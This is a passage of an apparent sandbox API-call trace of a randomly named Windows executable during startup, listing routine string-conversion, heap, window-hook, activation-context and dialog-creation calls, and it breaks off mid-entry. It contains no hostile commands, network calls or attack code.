¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0127.500] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0127.500] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0127.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿD\x0eÜJ\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0127.500] GetLastError () returned 0x0 [0127.500] SetLastError (dwErrCode=0x0) [0127.500] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0127.500] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0127.500] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0127.500] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0127.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿD\x0eÜJ\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0127.500] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x800) returned 0x2090fd0 [0127.500] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x415b5f) returned 0x0 [0127.501] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.502] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.502] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.503] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.504] GlobalLock (hMem=0x1fd0004) returned 0x5d1130 [0127.504] LocalAlloc (uFlags=0x40, uBytes=0x164) returned 0x5d2968 [0127.504] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x5df728 [0127.504] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x5d7278 [0127.504] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x5ce5d8 [0127.505] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x2012) returned 0x2092ab0 [0127.505] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0xc) returned 0x20917d8 [0127.505] LocalAlloc (uFlags=0x40, uBytes=0x188) returned 0x5d1f98 [0127.505] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x2a) returned 0x20917f0 [0127.505] LocalAlloc (uFlags=0x40, uBytes=0x64) returned 0x5ceaa0 [0127.505] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x2a) returned 0x2091828 [0127.505] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x5d82a0 [0127.505] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x28) returned 0x2091860 [0127.505] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.506] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.506] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.507] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.507] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.507] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc05f [0127.508] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.508] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.509] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.509] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.509] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.510] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.510] GetSystemMetrics (nIndex=11) returned 32 [0127.832] GetSystemMetrics (nIndex=12) returned 32 [0127.832] GetSystemMetrics (nIndex=2) returned 17 [0127.832] GetSystemMetrics (nIndex=3) returned 17 [0127.832] GetDC (hWnd=0x0) returned 0x10105c7 [0127.833] GetDeviceCaps (hdc=0x10105c7, index=88) returned 96 [0127.833] GetDeviceCaps (hdc=0x10105c7, index=90) returned 96 [0127.833] ReleaseDC (hWnd=0x0, hDC=0x10105c7) returned 1 [0127.833] GetSysColor (nIndex=15) returned 0xf0f0f0 [0127.833] GetSysColor (nIndex=16) returned 0xa0a0a0 [0127.833] GetSysColor (nIndex=20) returned 0xffffff [0127.833] GetSysColor (nIndex=18) returned 0x0 [0127.833] GetSysColor (nIndex=6) returned 0x646464 [0127.833] GetSysColorBrush (nIndex=15) returned 0x100072 [0127.833] GetSysColorBrush (nIndex=6) returned 0x10007a [0127.833] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0127.833] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0127.833] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.834] LoadLibraryW (lpLibFileName="UxTheme.dll") returned 0x73d30000 [0127.834] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.835] GetCursorPos (in: lpPoint=0x5d29b4 | out: lpPoint=0x5d29b4*(x=485, y=45)) returned 1 [0127.835] LocalAlloc (uFlags=0x40, uBytes=0x54) returned 0x5ce840 [0127.835] LocalReAlloc (hMem=0x5d7278, uBytes=0xc, uFlags=0x2) returned 0x5ceb58 [0127.835] GetCurrentThread () returned 0xfffffffe [0127.835] GetCurrentThreadId () returned 0x1338 [0127.835] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.836] LoadLibraryW (lpLibFileName="UxTheme.dll") returned 0x73d30000 [0127.836] RtlSizeHeap (HeapHandle=0x2090000, Flags=0x0, MemoryPointer=0x2092800) returned 0x80 [0127.836] RegisterClipboardFormatW (lpszFormat="WM_XHYPERLINK_CLICKED") returned 0xc19b [0127.836] SetErrorMode (uMode=0x0) returned 0x0 [0127.836] SetErrorMode (uMode=0x8001) returned 0x0 [0127.837] GetModuleHandleW (lpModuleName="KERNEL32") returned 0x74030000 [0127.837] GetProcAddress (hModule=0x74030000, lpProcName="CreateActCtxW") returned 0x74047840 [0127.837] GetProcAddress (hModule=0x74030000, lpProcName="ReleaseActCtx") returned 0x74047810 [0127.837] GetProcAddress (hModule=0x74030000, lpProcName="ActivateActCtx") returned 0x740477e0 [0127.837] GetProcAddress (hModule=0x74030000, lpProcName="DeactivateActCtx") returned 0x74047860 [0127.837] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x19fcb0, nSize=0x105 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\hAzbWFO.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hazbwfo.exe")) returned 0x23 [0127.837] CreateActCtxW (pActCtx=0x19fc90) returned 0xffffffff [0127.837] CreateActCtxW (pActCtx=0x19fc90) returned 0xffffffff [0127.837] CreateActCtxW (pActCtx=0x19fc90) returned 0x5d1dcc [0127.838] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x19fcb4, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\hAzbWFO.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hazbwfo.exe")) returned 0x23 [0127.838] PathFindExtensionW (pszPath="C:\\Users\\FD1HVy\\Desktop\\hAzbWFO.exe") returned=".exe" [0127.838] PathFindFileNameW (pszPath="C:\\Users\\FD1HVy\\Desktop\\hAzbWFO") returned="hAzbWFO" [0127.838] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x10) returned 0x2091890 [0127.838] FindResourceW (hModule=0x400000, lpName=0xe01, lpType=0x6) returned 0x0 [0127.839] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x10) returned 0x20918a8 [0127.839] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x48) returned 0x20918c0 [0127.839] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x18) returned 0x2091910 [0127.839] GetCurrentThreadId () returned 0x1338 [0127.839] SetWindowsHookExW (idHook=-1, lpfn=0x40bbd5, hmod=0x0, dwThreadId=0x1338) returned 0x130171 [0127.839] GetModuleHandleW (lpModuleName="user32.dll") returned 0x769e0000 [0127.839] GetProcAddress (hModule=0x769e0000, lpProcName="NotifyWinEvent") returned 0x769f28d0 [0127.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", ulOptions=0x0, samDesired=0x1, phkResult=0x19fed0 | out: phkResult=0x19fed0*=0x0) returned 0x2 [0127.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Network", ulOptions=0x0, samDesired=0x1, phkResult=0x19fed0 | out: phkResult=0x19fed0*=0x0) returned 0x2 [0127.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Comdlg32", ulOptions=0x0, samDesired=0x1, phkResult=0x19fed0 | out: phkResult=0x19fed0*=0x0) returned 0x2 [0127.840] LoadIconW (hInstance=0x400000, lpIconName=0x80) returned 0x190205 [0127.842] FindResourceW (hModule=0x400000, lpName=0x66, lpType=0x5) returned 0x43f908 [0127.842] LoadResource (hModule=0x400000, hResInfo=0x43f908) returned 0x4416d4 [0127.842] LockResource (hResData=0x4416d4) returned 0x4416d4 [0127.843] GetCurrentThreadId () returned 0x1338 [0127.843] SetWindowsHookExW (idHook=5, lpfn=0x408c05, hmod=0x0, dwThreadId=0x1338) returned 0x5022d [0127.843] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x60) returned 0x2091930 [0127.844] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73af0000 [0127.844] GetProcAddress (hModule=0x73af0000, lpProcName="InitCommonControlsEx") returned 0x73b6a480 [0127.844] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19fc9c | out: hActCtx=0x5d1dcc, lpCookie=0x19fc9c) returned 1 [0127.844] InitCommonControlsEx (picce=0x19fd20) returned 1 [0127.846] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070001) returned 1 [0127.846] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19fc9c | out: hActCtx=0x5d1dcc, lpCookie=0x19fc9c) returned 1 [0127.846] InitCommonControlsEx (picce=0x19fd20) returned 1 [0127.846] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070003) returned 1 [0127.846] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19fc9c | out: hActCtx=0x5d1dcc, lpCookie=0x19fc9c) returned 1 [0127.846] InitCommonControlsEx (picce=0x19fd20) returned 1 [0127.846] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070005) returned 1 [0127.847] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19fc9c | out: hActCtx=0x5d1dcc, lpCookie=0x19fc9c) returned 1 [0127.847] InitCommonControlsEx (picce=0x19fd20) returned 1 [0127.847] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070007) returned 1 [0127.847] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19fc9c | out: hActCtx=0x5d1dcc, lpCookie=0x19fc9c) returned 1 [0127.847] InitCommonControlsEx (picce=0x19fd20) returned 1 [0127.859] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070009) returned 1 [0127.859] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19fc9c | out: hActCtx=0x5d1dcc, lpCookie=0x19fc9c) returned 1 [0127.859] InitCommonControlsEx (picce=0x19fd20) returned 1 [0127.859] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c07000b) returned 1 [0127.859] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19fc9c | out: hActCtx=0x5d1dcc, lpCookie=0x19fc9c) returned 1 [0127.859] InitCommonControlsEx (picce=0x19fd20) returned 1 [0127.859] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c07000d) returned 1 [0127.859] GetVersionExW (in: lpVersionInformation=0x19fc18*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fc18*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0127.859] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19fbec | out: hActCtx=0x5d1dcc, lpCookie=0x19fbec) returned 1 [0127.860] GetModuleHandleW (lpModuleName="shell32.dll") returned 0x74a80000 [0127.860] GetProcAddress (hModule=0x74a80000, lpProcName="InitNetworkAddressControl") returned 0x74cf3710 [0127.860] InitNetworkAddressControl () returned 1 [0127.864] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c07000f) returned 1 [0127.864] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x2c) returned 0x2091998 [0127.864] CreateDialogIndirectParamW (hInstance=0x400000, lpTemplate=0x4416d4, hWndParent=0x0, lpDialogFunc=0x403ac4, dwInitParam=0x0) [0127.874] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19f5ac | out: hActCtx=0x5d1dcc, lpCookie=0x19f5ac) returned 1 [0127.874] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x44) returned 0x20919d0 [0127.874] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x7c) returned 0x2091a20 [0127.874] GetParent (hWnd=0x402ce) returned 0x0 [0127.874] SetWindowLongW (hWnd=0x402ce, nIndex=-4, dwNewLong=4225620) returned 2000770896 [0127.875] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070011) returned 1 [0127.875] CallNextHookEx (hhk=0x5022d, nCode=3, wParam=0x402ce, lParam=0x19f830) returned 0x0 [0127.876] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x402ce, Msg=0x81, wParam=0x0, lParam=0x19f880) returned 0x1 [0127.877] ActivateActCtx (in: hActCtx=0x5d1dcc, lpCookie=0x19f52c | out: hActCtx=0x5d1dcc, lpCookie=0x19f52c) returned 1 [0127.877] GetClassInfoExW (in: hInstance=0x0, lpszClass="#32768", lpwcx=0x19f57c | out: lpwcx=0x19f57c) returned 1 [0127.877] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c070012) returned 1 [0127.877] GetClassLongW (hWnd=0x302cc, nIndex=-32) returned 0xc026 [0127.877] GetWindowLongW (hWnd=0x302cc, nIndex=-4) returned 1990213872 [0127.877] GetPropW (hWnd=0x302cc, lpString="AfxOldWndProc423") returned 0x0 [0127.877] SetPropW (hWnd=0x302cc, lpString="AfxOldWndProc423", hData=0x76a040f0) returned 1 [0127.877] GetPropW (hWnd=0x302cc, lpString="AfxOldWndProc423") returned 0x76a040f0 [0127.878] GlobalAddAtomW (lpString="AfxOldWndProc423") returned 0xc0ed [0127.878] SetWindowLongW (hWnd=0x302cc, nIndex=-4, dwNewLong=4229816) returned 2000771056 [0127.879] CallNextHookEx (hhk=0x5022d, nCode=3, wParam=0x302cc, lParam=0x19f830) returned 0x0 [0127.879] GetPropW (hWnd=0x302cc, lpString="AfxOldWndProc423") returned 0x76a040f0 [0127.879] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x302cc, Msg=0x81, wParam=0x0, lParam=0x19f880) returned 0x1 [0127.880] GetPropW (hWnd=0x302cc, lpString="AfxOldWndProc423") returned 0x76a040f0 [0127.880] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x302cc, Msg=0x83, wParam=0x0, lParam=0x19f86c) returned 0x0 [0127.880] GetPropW (hWnd=0x302cc, lpString="AfxOldWndProc423") returned 0x76a040f0 [0127.880] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x302cc, Msg=0x1, wParam=0x0, lParam=0x19f880) returned 0x0 [0127.881] GetPropW (hWnd=0x302cc, lpString="AfxOldWndProc423") returned 0x76a040f0 [0127.881] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x302cc, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0127.881] GetPropW (hWnd=0x302cc, lpString="AfxOldWndProc423") returned 0x76a040f0 [0127.881] CallWindowProcW (lpPrevWndFunc=0x76a040f0, hWnd=0x302cc, 